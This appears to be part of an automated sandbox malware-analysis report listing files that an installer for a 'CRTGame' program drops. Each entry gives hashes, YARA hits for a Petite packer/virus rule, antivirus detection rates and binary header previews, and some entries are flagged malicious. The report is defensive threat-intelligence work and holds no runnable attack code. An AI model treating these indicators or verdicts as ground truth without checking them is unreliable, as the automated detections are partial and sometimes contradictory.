                                                                            • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-FJ939.tmp, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...................................D.... ..PE..L...#.MZ...........!.................p.......0............................................@.........................Pr.......q..d....P..8....................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`..................................................l..a.......1...3W..Z.....H...5.(...$.. .>X9..Fn... ..."j1..........%.7.d...".m...n.ePY......`....I.gYo..UC....Rq(...F......s..8`.I.....i..F.....'......@..-;.........J...Oq...b@...........$.D4E..($.....8':*;.q....[-..{..w....@M....J$..0d..9Q.I^.^y.E..*L_-.x!s.......W.H.R..@.6....MQ.Q8.s.."...!."IX.vM...!e.$%......U.....F.CoI..X.dA...0.Y..r.8.*p...<..M y...8..s....N5<.J....&..`...w..'..\s..%..A.`....s..j.H...X#..R.\..)R3@..X.P.5...G..t.f/..C.b.d...|.
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):852754
                                                                            Entropy (8bit):6.503318968423685
                                                                            Encrypted:false
                                                                            SSDEEP:12288:fpFFQV+FKJ37Dm+yY4pBkPr2v2meLaoHN/oBrZ3ixdnGVzpJXm/iN:fpnzFw37iDYIBkzuPcHNgrZ3uGVzm/iN
                                                                            MD5:07FB6D31F37FB1B4164BEF301306C288
                                                                            SHA1:4CB41AF6D63A07324EF6B18B1A1F43CE94E25626
                                                                            SHA-256:06DDF0A370AF00D994824605A8E1307BA138F89B2D864539F0D19E8804EDAC02
                                                                            SHA-512:CAB4A7C5805B80851ABA5F2C9B001FABC1416F6648D891F49EACC81FE79287C5BAA01306A42298DA722750B812A4EA85388FFAE9200DCF656DD1D5B5B9323353
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L..Y.,..v......!......... .....................a................................O}........ ......................................@.......................P..X0...........................0.......................................................text...............................`.P`.data...............................@.`..rdata..............................@.`@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,.... ......................@.0..tls.... ....0......................@.0..rsrc........@......................@.0..reloc..X0...P...2..................@.0B/4...................&..............@.@B/19.................*..............@..B/31..........@......................@..B/45..........`......................@..B/57.................................@.0B/70.....i...............
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):967168
                                                                            Entropy (8bit):6.500850562754145
                                                                            Encrypted:false
                                                                            SSDEEP:12288:j2ezAN6FpYQSzclODziLQEkkDHFb1aWGssVvVmPUwV+SiRm7rhj:jhAgFptPlqmPDHJ1apVdYUy+jRmX
                                                                            MD5:C06D6F4DABD9E8BBDECFC5D61B43A8A9
                                                                            SHA1:16D9F4F035835AFE8F694AE5529F95E4C3C78526
                                                                            SHA-256:665D47597146DDAAA44B771787B750D3CD82C5B5C0B33CA38F093F298326C9BB
                                                                            SHA-512:B0EBE9E2682A603C34F2B884121FA5D2D87ED3891990CCD91CD14005B28FE208A3B86FA20E182F9E7FC5142A267C8225AEFDCB23CF5B7556D2CF8F9E3BDE62D4
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.~..m...m...m......m.....m......m.......m..)3...m..)3...m..)3...m.......m...m..rm...m..m..3...m..3...m..3...m..Rich.m..........................PE..L...8..^...........!.........&.......`....................................................@..........................4.......G..<...............................HR..P+..T............................+..@...............D............................text............................... ..`.rdata..............................@..@.data........P...$...D..............@....trace.......`.......h..............@..@.gfids...............~..............@..@_RDATA..@...........................@..@.debug_o............................@..B.rsrc................l..............@..@.reloc..HR.......T...n..............@..B................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):127669
                                                                            Entropy (8bit):7.952352167575405
                                                                            Encrypted:false
                                                                            SSDEEP:3072:kdGUCKL7Wn/OzU2ThapTv773+HMnBasgGlBM:dn/mU8K/3EgNgoM
                                                                            MD5:75C1D7A3BDF1A309C540B998901A35A7
                                                                            SHA1:B06FEEAC73D496C435C66B9B7FF7514CBE768D84
                                                                            SHA-256:6303F205127C3B16D9CF1BDF4617C96109A03C5F2669341FBC0E1D37CD776B29
                                                                            SHA-512:8D2BBB7A7AD34529117C8D5A122F4DAF38EA684AACD09D5AD0051FA41264F91FD5D86679A57913E5ADA917F94A5EF693C39EBD8B465D7E69EF5D53EF941AD2EE
                                                                            Malicious:false
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-HASL7.tmp, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZ......................@...................................D.... ..PE..L....O?\...........!.................`.......................................p............@..........................b.......a.......0..@...........................................................................<b..H.................................... ..........................@..@.rsrc........0......................@..@......... ...@.........................@petite.......`......................`..`..........................................fE...nj.:<...n...1..}..r..". .S(...#!............7..5.Q..0..}.. .....^y...U...@..3.........&.lp(.pt.a......!..`@C.O3G7..."\..w.1u.$4..1h...M...K6.L...L..~.w...b2x-.......9k".....".V\............o..................qO&.......4(."0.Zy....2..Y..Z..:2.XM..D....a&..&.L,......./+......c<...^.2.x0..H.618....Q.Q.5.%...Z1.I.......a...q-}.0..D....o.!.....O.......B....# O.!....cY5.#...n.`..1...r!.)].:...m.f.....x....N"t.j..l.....:/...,.v........8F.N...X..j.R......"...&...
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):36752
                                                                            Entropy (8bit):7.780431937344781
                                                                            Encrypted:false
                                                                            SSDEEP:768:E7epCl6I8YbTvEKXQ2vm+iocmmMt7KjuDnlVahRlmftuY5B:EepUv8aZvmd+7nDDalauy
                                                                            MD5:9FF783BB73F8868FA6599CDE65ED21D7
                                                                            SHA1:F515F91D62D36DC64ADAA06FA0EF6CF769376BDF
                                                                            SHA-256:E0234AF5F71592C472439536E710BA8105D62DFA68722965DF87FED50BAB1816
                                                                            SHA-512:C9D3C3502601026B6D55A91C583E0BB607BFC695409B984C0561D0CBE7D4F8BD231BC614E0EC1621C287BF0F207017D3E041694320E692FF00BC2220BFA26C26
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.........n.......................................................B....@.........................P...........d.......@............s.......x..........................................................8............................................j..................@..@.rsrc.... ...........l..............@..@petite...............p..............`..`..................8..u...I.x|}...g{...@..ffe.c4.-.Bj..........U.J.`..s.N:`..I@;..B.kbmj..E%2. `....".]&.&.).BB...E..4u'.....Q.......%....V.............5...y....E..q<w.....j...B..O...p....*.X...m...= .X..........4........~~.8.F@.V...6....;?.5..)S.m.9U......^.zO!1o.F.E. ...H=`2...9.(...4).E.!G..;R.1.#.h0..(*..t8..O...Td.d..~...l.a..U...b<../..W....M6...U*G..II.x........>..I[...v.N/.V..3..Y.c...Zh.i..i.....n....M..D....5o."....(.9.+..z...._$t.T...X#\...N....Q%...>U..|....J
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:Unicode text, UTF-8 text
                                                                            Category:dropped
                                                                            Size (bytes):1059
                                                                            Entropy (8bit):5.1208137218866945
                                                                            Encrypted:false
                                                                            SSDEEP:24:LLDrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:LLDaJHlxE35QHOs5exm3ogF5n
                                                                            MD5:B7EDCC6CB01ACE25EBD2555CF15473DC
                                                                            SHA1:2627FF03833F74ED51A7F43C55D30B249B6A0707
                                                                            SHA-256:D6B4754BB67BDD08B97D5D11B2D7434997A371585A78FE77007149DF3AF8D09C
                                                                            SHA-512:962BD5C9FB510D57FAC0C3B189B7ADEB29E00BED60F0BB9D7E899601C06C2263EDA976E64C352E4B7C0AAEFB70D2FCB0ABEF45E43882089477881A303EB88C09
                                                                            Malicious:false
                                                                            Preview:Copyright (c) 2011 Jan Kokem.ller..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):11532
                                                                            Entropy (8bit):7.219753259626605
                                                                            Encrypted:false
                                                                            SSDEEP:192:Dqv1jf+0vAe7Dl+JTGxuK5Rbfh70Il9MWbzq6UWkE0FGemexbiJi8TK0Q2:m9KIAeNgTGxu2Jfh1DMSzqKkvFGLJi85
                                                                            MD5:073F34B193F0831B3DD86313D74F1D2A
                                                                            SHA1:3DF5592532619C5D9B93B04AC8DBCEC062C6DD09
                                                                            SHA-256:C5EEC9CD18A344227374F2BC1A0D2CE2F1797CFFD404A0A28CF85439D15941E9
                                                                            SHA-512:EEFD583D1F213E5A5607C2CFBAED39E07AEC270B184E61A1BA0B5EF67ED7AC5518B5C77345CA9BD4F39D2C86FCD261021568ED14945E7A7541ADF78E18E64B0C
                                                                            Malicious:false
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-IG6J1.tmp, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZ......................@...................................D.... ..PE..L.....V...........!.........(...............P............................................@.........................P...........d....p..8...................82.........................................................8....................................`.......$..................@..@.rsrc........p.......&..............@..@.......................................@petite...............*..............`..`....................................#..L....y......"......O/..M...C.A.&:.e.i..l....CP...g.AK..S;.lf.?.g....].k.U.G.Y.J.",......%....:ge.D x.P }}..Tih.g......%G.Iy.j...\..*.S...s..$..........o..y..........,.........-..X.....v.M1..*'...5R.4..8k!..q.=*BVST<..M.E.._T.p...K.r....C.HEO....\..%%,I....>'.L.ct..{..I..l.Y#f Tk*...:bH?.....G..Y.p..Q.....z/R.h>8....]S.....p.c/.m..6tc.d..(..{...=w4.w.^..d.....^..Tp.....Z.*.).Z."...&.-...o...xD+0.L+!...X.%?)+.P..Z.......P..F..P.".._.%9.^T;(..Y.>.. .....re
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):34392
                                                                            Entropy (8bit):7.81689943223162
                                                                            Encrypted:false
                                                                            SSDEEP:768:mYBs3O9YL558R6R8P8W2rjQZQtfTIxRYsetoPNvPWIl+syr:vsUY15mqzW2u8rIxisFcJr
                                                                            MD5:EA245B00B9D27EF2BD96548A50A9CC2C
                                                                            SHA1:8463FDCDD5CED10C519EE0B406408AE55368E094
                                                                            SHA-256:4824A06B819CBE49C485D68A9802D9DAE3E3C54D4C2D8B706C8A87B56CEEFBF3
                                                                            SHA-512:EF1E107571402925AB5B1D9B096D7CEFF39C1245A23692A3976164D0DE0314F726CCA0CB10246FE58A13618FD5629A92025628373B3264153FC1D79B0415D9A7
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ph..4...4...4.......0...[...0...[...6...4.......V...0...`*..........5....)......Rich4...........................PE..L.....T...........!................6 .......................................0......................................D#..y....!..d.......X............................................................................................................................z..................`....rsrc...........X...................@..@....................................`...petite....... ......................`...................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):18966
                                                                            Entropy (8bit):7.620111275837424
                                                                            Encrypted:false
                                                                            SSDEEP:384:gOKwxnw6OVDU839fgRgFMkucNauTT80CyTIz2bGjqXOK0Jo:gOHwBDUOe2McQkI0Cyo2Q/o
                                                                            MD5:F0F973781B6A66ADF354B04A36C5E944
                                                                            SHA1:8E8EE3A18D4CEC163AF8756E1644DF41C747EDC7
                                                                            SHA-256:04AB613C895B35044AF8A9A98A372A5769C80245CC9D6BF710A94C5BC42FA1B3
                                                                            SHA-512:118D5DACC2379913B725BD338F8445016F5A0D1987283B082D37C1D1C76200240E8C79660E980F05E13E4EB79BDA02256EAC52385DAA557C6E0C5D326D43A835
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-KCF1P.tmp, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZ......................@...................................D.... ..PE..L...9#.]...........!.........B...............p............................................@.....................................x.......@....................M..........................................................@............................................>..................@..@.rsrc................@..............@..@.......................................@petite...............D..............`..`....................................g5 ....S%,_ .]/.0$R.yB..."@...N.AGG.^.?...1.........&?....v....6.0.. ME..(..gh\jv#.l..#$.Z&...._\`.@.......D.;.C~..m}3..\>.h..@.;.f Tho...(xVs..m.c..F..SS.C...z[....z...... .X.&....HY,...o.d..jP.nr..@.)..W.1#...b..Q.*E8.B..N5.....].........7..A..2c.M.q.O0(.Gi..B.....CT.(..+....>@T j.#!..."..P.u.3..5.Q0K..p....ERvG..._'...ir%m...NT.v:.....g.....8.+....m....8..Z.=.B.......D_..ln...C.......p8...e."...U...+.f..E.=X.j.DeD.X_.Y..n.r.!xWu..\.VB.......`.F.A....dx...
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):115712
                                                                            Entropy (8bit):6.401537154757194
                                                                            Encrypted:false
                                                                            SSDEEP:3072:rY4gILp0Vt7BMkvfHutO+eP0ZjflQf5xqkYXeo21sb2rqG70:rY4gILp0Vt77nLBCtQfjqv8qG70
                                                                            MD5:840D631DA54C308B23590AD6366EBA77
                                                                            SHA1:5ED0928667451239E62E6A0A744DA47C74E1CF89
                                                                            SHA-256:6BAD60DF9A560FB7D6F8647B75C367FDA232BDFCA2291273A21179495DAC3DB9
                                                                            SHA-512:1394A48240BA4EF386215942465BDE418C5C6ED73FC935FE7D207D2A1370155C94CDC15431985ED4E656CA6B777BA79FFC88E78FA3D99DB7E0E6EAC7D1663594
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?..R{...{...{...o...q...o.......o...i...)...W...)...t...)...j...o...x...{.......-...s...-...z...-.4.z...-...z...Rich{...........PE..L....H.a...........!.....$...........h.......@............................... ............@.............................x.......(.......................................8..............................@............@..D............................text....#.......$.................. ..`.rdata...x...@...z...(..............@..@.data.... ..........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):26526
                                                                            Entropy (8bit):4.600837395607617
                                                                            Encrypted:false
                                                                            SSDEEP:384:Lc56OuAbnn0UReX6wFDVxnFw7xqsvzt+z/k8E9HinIhFkspcM9bc7ups0CZuQG:Lc5trLeDnFMz1ReScmc7GshZuQG
                                                                            MD5:BD7A443320AF8C812E4C18D1B79DF004
                                                                            SHA1:37D2F1D62FEC4DA0CAF06E5DA21AFC3521B597AA
                                                                            SHA-256:B634AB5640E258563C536E658CAD87080553DF6F34F62269A21D554844E58BFE
                                                                            SHA-512:21AEF7129B5B70E3F9255B1EA4DC994BF48B8A7F42CD90748D71465738D934891BBEC6C6FC6A1CCFAF7D3F35496677D62E2AF346D5E8266F6A51AE21A65C4460
                                                                            Malicious:false
                                                                            Preview: GNU LESSER GENERAL PUBLIC LICENSE. Version 2.1, February 1999.. Copyright (C) 1991, 1999 Free Software Foundation, Inc.. 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...[This is the first released version of the Lesser GPL. It also counts. as the successor of the GNU Library Public License, version 2, hence. the version number 2.1.].. Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.Licenses are intended to guarantee your freedom to share and change.free software--to make sure the software is free for all its users... This license, the Lesser General Public License, applies to some.specially designated software packages--typically libraries--of the.Free Software Foundation and other authors who
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):197120
                                                                            Entropy (8bit):6.423554884287906
                                                                            Encrypted:false
                                                                            SSDEEP:6144:X+dMKihenEUunaA+mVMISPCG5vHglwiaJVZkRyAHeOdrQpCklkHy+axeY0R2JdXs:MagxOOZWP2dC28d+y2e
                                                                            MD5:67247C0ACA089BDE943F802BFBA8752C
                                                                            SHA1:508DA6E0CF31A245D27772C70FFA9A2AE54930A3
                                                                            SHA-256:BAB8D388EA3AF1AABB61B8884CFAA7276A2BFD77789856DD610480C55E4D0A60
                                                                            SHA-512:C4A690A53581D3E4304188FD772C6F1DA1C72ED2237A13951ACE8879D1986423813A6F7534FF506790CB81633CEB7FF6A6239C1F852725FBACA4B40D9AE3F2DB
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d,.. M.. M.. M..4&..-M..4&...M..4&..3M..r8...M..r8../M..r8..1M..4&..#M.. M.._M..v8..$M..v8..!M..v8..!M..v8..!M..Rich M..........PE..L... ..a...........!.........................................................@............@.........................@...p.......(............................ ..(...P...8...............................@...............H............................text...>........................... ..`.rdata..d...........................@..@.data...H...........................@....rsrc...............................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):62478
                                                                            Entropy (8bit):6.063363187934607
                                                                            Encrypted:false
                                                                            SSDEEP:768:q3s6+NMpjqudP/XB9rGCWLEc6wY3U0LvDcb0wGNPdqdRJy/5f4mdajO42iySAqB:q8zNM1nBId/ce7GNP6m/5AQGySAs
                                                                            MD5:940EEBDB301CB64C7EA2E7FA0646DAA3
                                                                            SHA1:0347F029DA33C30BBF3FB067A634B49E8C89FEC2
                                                                            SHA-256:B0B56F11549CE55B4DC6F94ECBA84AEEDBA4300D92F4DC8F43C3C9EEEFCBE3C5
                                                                            SHA-512:50D455C16076C0738FB1FECAE7705E2C9757DF5961D74B7155D7DFB3FAB671F964C73F919CC749D100F6A90A3454BFF0D15ED245A7D26ABCAA5E0FDE3DC958FD
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................k.........................`................ .........................r.......D............................P..|.......................................................\............................text...............................`.P`.data...0...........................@.0..rdata..8...........................@.`@/4......L...........................@.0@.bss..................................`..edata..r...........................@.0@.idata..D...........................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc..|....P......................@.0B................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):337408
                                                                            Entropy (8bit):6.515131904432587
                                                                            Encrypted:false
                                                                            SSDEEP:6144:3nzsyDn7PDS+FDflUjvJUkbEOyF1rOpsuCOuOff5k4F/lTRHA:3377SKfgvqkbFyFJCRRzH
                                                                            MD5:62D2156E3CA8387964F7AA13DD1CCD5B
                                                                            SHA1:A5067E046ED9EA5512C94D1D17C394D6CF89CCCA
                                                                            SHA-256:59CBFBA941D3AC0238219DAA11C93969489B40F1E8B38FABDB5805AC3DD72BFA
                                                                            SHA-512:006F7C46021F339B6CBF9F0B80CFFA74ABB8D48E12986266D069738C4E6BDB799BFBA4B8EE4565A01E90DBE679A96A2399D795A6EAD6EACBB4818A155858BF60
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@..|...|...|...p...|...w...|.d.r...|...v...|...x...|.i.#...|...}.|.|.d.!...|...w...|..V....|...v...|.......|. .z...|.Rich..|.........PE..L....r.b.....................>......\........ ....@.......................................@.....................................x....0.......................@...3................................................... ..(............................text............................... ..`.rdata..r.... ......................@..@.data....'..........................@....sxdata...... ......................@....rsrc........0......................@..@.reloc...<...@...>..................@..B........................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):394752
                                                                            Entropy (8bit):6.662070316214798
                                                                            Encrypted:false
                                                                            SSDEEP:6144:uAlmRfeS+mOxv8bgDTuXU54l8WybBE36IpuIT9nxQPQnhH/a0CRdWqWJwGKp:zlm0S+SEuXU54NylJIJ9KPQnhilRsVJ
                                                                            MD5:A4123DE65270C91849FFEB8515A864C4
                                                                            SHA1:93971C6BB25F3F4D54D4DF6C0C002199A2F84525
                                                                            SHA-256:43A9928D6604BF604E43C2E1BAB30AE1654B3C26E66475F9488A95D89A4E6113
                                                                            SHA-512:D0834F7DB31ABA8AA9D97479938DA2D4CD945F76DC2203D60D24C75D29D36E635C2B0D97425027C4DEBA558B8A41A77E288F73263FA9ABC12C54E93510E3D384
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......KL...-d..-d..-d..U...-d..Be..-d.TEe..-d..-e.:-d..Ba..-d..B`..-d..Bg..-d..B`.c-d..Bd..-d..B...-d..Bf..-d.Rich.-d.........................PE..L.....b`...........!.....L..........+S.......`...............................P............@.................................L........... .................... ..\ ..$...............................@...@............`...............................text...NK.......L.................. ..`.rdata......`.......P..............@..@.data...............................@....rsrc... ...........................@..@.reloc..\ ... ..."..................@..B................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):772608
                                                                            Entropy (8bit):6.546391052615969
                                                                            Encrypted:false
                                                                            SSDEEP:6144:Q75mFL0MNnM/SQdtij4UujFhGiNV1SckT3wio2L2jV6EfnQ29mwF3s4iGtInw1m8:AwN0e0lN1fnQUFccGns9ukS6
                                                                            MD5:B3B487FC3832B607A853211E8AC42CAD
                                                                            SHA1:06E32C28103D33DAD53BE06C894203F8808D38C1
                                                                            SHA-256:30BC10BD6E5B2DB1ACE93C2004E24C128D20C242063D4F0889FD3FB3E284A9E4
                                                                            SHA-512:FA6BDBA4F2A0CF4CCA40A333B69FD041D9EDC0736EDA206F17F10AF5505CC4688B0401A3CAD2D2F69392E752B8877DB593C7872BCDB133DC785A200FF38598BB
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....1.d.................D..........$].......`....@.......................................@......@...................0..o............p...(...................`...............................P......................X........ .......................text...h4.......6.................. ..`.itext.......P.......:.............. ..`.data....7...`...8...H..............@....bss....0i...............................idata..............................@....didata...... ......................@....edata..o....0......................@..@.tls.........@...........................rdata..]....P......................@..@.reloc.......`......................@..B.rsrc....(...p...(..................@..@....................................@..@................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):36416
                                                                            Entropy (8bit):7.842278356440954
                                                                            Encrypted:false
                                                                            SSDEEP:768:lshkyPXvH6bPACtmb8boNQdVfCXewki/OvXEApOqmFfSq1oIQMW:lsh3n5Pb8boOdVCuwNEXEAonfSq1JQb
                                                                            MD5:BEBA64522AA8265751187E38D1FC0653
                                                                            SHA1:63FFB566AA7B2242FCC91A67E0EDA940C4596E8E
                                                                            SHA-256:8C58BC6C89772D0CD72C61E6CF982A3F51DEE9AAC946E076A0273CD3AAF3BE9D
                                                                            SHA-512:13214E191C6D94DB914835577C048ADF2240C7335C0A2C2274C096114B7B75CD2CE13A76316963CCD55EE371631998FAC678FCF82AE2AE178B7813B2C35C6651
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...................................D.... ..PE..L....}.Q...........!................6 ............`..........................0......................................d#.......!..........@...................t...........................................................................................................................`....rsrc...........@...................@..@....................................@................ ......................`.......................................X...{.......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!... c.f.`P....h.p..j..P..C.h..`..<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.....................]...............'..................................A...%...........
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):35588
                                                                            Entropy (8bit):7.817557274117395
                                                                            Encrypted:false
                                                                            SSDEEP:768:dCrMZHv56WRldhmLjQDrbfc8cznHvc6modHQ:sAR0LzHvc6m2HQ
                                                                            MD5:58521D1AC2C588B85642354F6C0C7812
                                                                            SHA1:5912D2507F78C18D5DC567B2FA8D5AE305345972
                                                                            SHA-256:452EEE1E4EF2FE2E00060113CCE206E90986E2807BB966019AC4E9DEB303A9BD
                                                                            SHA-512:3988B61F6B633718DE36C0669101E438E70A17E3962A5C3A519BDECC3942201BA9C3B3F94515898BB2F8354338BA202A801B22129FC6D56598103B13364748C1
                                                                            Malicious:false
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-ONP9R.tmp, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZ......................@...................................D.... ..PE..L.....yX...........!.................@.......................................P............@.........................PB.......A..d.... ..@...................P........................................................A..8...............................................................@..@.rsrc........ ......................@..@.............0.........................@petite.......@......................`..`...................................._3.....g.ge..7t...R-_.R.@c.S.\..J?L.EZ.,....=H8..;.QJ.....P-)eFs93:.^...f......}..?...e...SD.......-.u.......q2...P...6..z5.T.S..P..Q....@..Mq.>....8" F...,..FE...S.[U..c......jr....b...-%...`......w..+W.C......]..#......LS....W.Y....o.8...i.[)..%(.2.t...YY .bL.....b.@&J,?l.........$..F..&...a#.\[".^...&]co....K.>...xQzw..XW.uT..+dm.o.b...@c....3..r....@]...P........{C/.....A!.&..........'....._..."S..&..F.......:.dxtK.6...7.I...Q..Nm2.....NX..fG..L..7.?..".(
